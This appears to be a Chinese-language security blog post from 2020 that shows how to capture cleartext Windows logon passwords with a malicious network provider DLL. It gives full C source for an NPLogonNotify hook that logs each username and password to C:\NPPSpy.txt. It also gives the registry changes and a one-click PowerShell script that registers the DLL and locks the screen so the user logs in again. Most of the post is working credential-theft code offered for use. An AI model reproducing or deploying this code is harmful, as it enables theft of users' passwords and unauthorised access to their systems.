利用系統函式獲取Windows明文密碼
阿新 • • 發佈:2020-07-22
0x01 前言
前段時間,根據大佬Grzegorz Tworek釋出的 :使用LanMan版本的NPLogonNotify()函式來嗅探用於登入Windows的每個密碼。明文。無需重新啟動。今天過來研究一波,同時借鑑 來自鴻鵠 ly大佬寫的整合powershell呼叫,來進一步方便利用。
0x02 原理
通過修改登錄檔,藉助系統函式,抓取Windows明文密碼
0x03 復現
然後將下列程式碼編譯為dll檔案:
NPPSPy.c原始碼
#include <Windows.h> // from npapi.h #define WNNC_SPEC_VERSION 0x00000001 #define WNNC_SPEC_VERSION51 0x00050001 #define WNNC_NET_TYPE 0x00000002 #define WNNC_START 0x0000000C #define WNNC_WAIT_FOR_START 0x00000001 //from ntdef.h typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; // from NTSecAPI.h typedef enum _MSV1_0_LOGON_SUBMIT_TYPE { MsV1_0InteractiveLogon = 2, MsV1_0Lm20Logon, MsV1_0NetworkLogon, MsV1_0SubAuthLogon, MsV1_0WorkstationUnlockLogon = 7, MsV1_0S4ULogon = 12, MsV1_0VirtualLogon = 82, MsV1_0NoElevationLogon = 83, MsV1_0LuidLogon = 84, } MSV1_0_LOGON_SUBMIT_TYPE, * PMSV1_0_LOGON_SUBMIT_TYPE; // from NTSecAPI.h typedef struct _MSV1_0_INTERACTIVE_LOGON { MSV1_0_LOGON_SUBMIT_TYPE MessageType; UNICODE_STRING LogonDomainName; UNICODE_STRING UserName; UNICODE_STRING Password; } MSV1_0_INTERACTIVE_LOGON, * PMSV1_0_INTERACTIVE_LOGON; void SavePassword(PUNICODE_STRING username, PUNICODE_STRING password) { HANDLE hFile; DWORD dwWritten; hFile = CreateFile(TEXT("C:\\NPPSpy.txt"), GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile != INVALID_HANDLE_VALUE) { SetFilePointer(hFile, 0, NULL, FILE_END); WriteFile(hFile, username->Buffer, username->Length, &dwWritten, 0); WriteFile(hFile, L" -> ", 8, &dwWritten, 0); WriteFile(hFile, password->Buffer, password->Length, &dwWritten, 0); WriteFile(hFile, L"\r\n", 4, &dwWritten, 0); CloseHandle(hFile); } } __declspec(dllexport) DWORD APIENTRY NPGetCaps( DWORD nIndex ) { switch (nIndex) { case WNNC_SPEC_VERSION: return WNNC_SPEC_VERSION51; case WNNC_NET_TYPE: return WNNC_CRED_MANAGER; case WNNC_START: return WNNC_WAIT_FOR_START; default: return 0; } } __declspec(dllexport) DWORD APIENTRY NPLogonNotify( PLUID lpLogonId, LPCWSTR lpAuthInfoType, LPVOID lpAuthInfo, LPCWSTR lpPrevAuthInfoType, LPVOID lpPrevAuthInfo, LPWSTR lpStationName, LPVOID StationHandle, LPWSTR* lpLogonScript ) { SavePassword( &(((MSV1_0_INTERACTIVE_LOGON*)lpAuthInfo)->UserName), &(((MSV1_0_INTERACTIVE_LOGON*)lpAuthInfo)->Password) ); lpLogonScript = NULL; return WN_SUCCESS; }
通過修改登錄檔,來實現讀取密碼效果
- 將NPPSpy.dll複製到System32資料夾
- 新增
"NPPSpy"
在結束"ProviderOrder"
在HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order
- 建立
HKLM\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider
並設定以下值:"Class" = [REG_DWORD]2
"ProviderPath" = [REG_EXPAND_SZ]"%SystemRoot%\System32\NPPSPY.dll"
"Name" = [REG_SZ]"NPPSpy"
通過Powershell指令碼進行呼叫,實現修改登錄檔的功能
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER $UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy" Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2 New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dl
將編譯好的NPPSpy.dll複製到System32資料夾
執行ps1指令碼:
然後 模擬使用者登出、重新的登入,抓取到明文密碼
為了方便,直接加入鎖屏功能,一鍵修改登錄檔+鎖屏:
$path = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order" -Name PROVIDERORDER
$UpdatedValue = $Path.PROVIDERORDER + ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy
New-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "Name" -Value NPPSpy
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy\NetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%\System32\NPPSPY.dll"
Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation